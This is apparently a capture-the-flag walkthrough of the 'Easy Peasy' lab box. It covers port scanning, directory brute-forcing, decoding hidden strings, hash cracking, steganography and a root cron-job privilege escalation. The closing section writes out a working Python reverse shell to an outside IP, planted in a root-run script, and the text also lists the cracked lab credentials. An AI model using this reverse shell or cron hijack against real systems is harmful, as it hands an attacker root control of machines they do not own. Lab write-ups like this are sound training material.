Easy Peasy
Port 80 enumeration - Port 65524 enumeration - Stegnography - Encryptions - CronJob PrivEsc
Initial Compromise
Running a simple Nmap scan is not enough to detect all open ports since 2 services are not part of the standard ports. You’ll need to run Nmap with the
-p-
flag to discover the 3 running services
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
Using
gobuster
against the Nginx service running on port80/tcp
allows the discovery of a/hidden
directory
kali@kali:/data/Easy_Peasy/files$ gobuster dir -u http://10.10.105.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.105.32
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/24 10:08:01 Starting gobuster
===============================================================
/hidden (Status: 301)
Further enumerating this directory leads to a
/hidden/whatever/
locationThe analysis of the source code reveals a hidden paragraph with an encoded string
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32/hidden/whatever/
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
background-repeat: no-repeat;
background-size: cover;
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>
The string is base64 encoded
$ echo -n "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d
flag{REDACTED}
Apache Enumeration
Simply visiting the
/robots.txt
page gives us
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions
One of which is we'll have to change the User-Agent to
a18672860d0510e5ab6699730763b250
to get furtherAnd the second one is the User-Agent looks fishy, maybe it's md5 hash - Yes it is the flag 2 :)
The main page shows a standard Apache page, but hints have been hidden in the source code of that page
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep flag
<a href="#flag">hi</a>
Fl4g 3 : flag{REDACTED}
Still in the source code of the main page, we can find a hidden paragraph with an encoded string
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep hidden
<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
It decodes to
/n0th1ng3ls3m4tt3r
withbase62
Browsing the location gathered previously reveals a hash gives us
kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/
<html>
<head>
<title>random title</title>
<style>
body {
background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
background-color:black;
}
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>
Let’s crack this hash with John the Ripper using the wordlist provided in the challenge
easypeasy.txt
kali@kali:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt
kali@kali:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The page found just previously also contains a jpg file. Let’s download the picture and decrypt the secret with
steghide
using the password cracked just before (mypasswordforthatjob
)
kali@kali:/data/Easy_Peasy/files$ wget http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
kali@kali:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg
Enter passphrase:
wrote extracted data to "secrettext.txt".
kali@kali:/data/Easy_Peasy/files$ cat secrettext.txt
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
This file gives us a username (
boring
) and a binary encoded password, which decodes toiconvertedmypasswordtobinary
- We can now SSH and get a shell on the box :)
Privilege Escalation
The user is not in the sudoers but there is a cron job executed by
root
boring@kral4-PC:~$ sudo -l
[sudo] password for boring:
Sorry, user boring may not run sudo on kral4-PC.
boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
The file is owned by our user, we can modify it
boring@kral4-PC:~$ ls -l /var/www/.mysecretcronjob.sh
-rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/.mysecretcronjob.sh
boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
# i will run as root
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Start a listener and get R00T :)
Last updated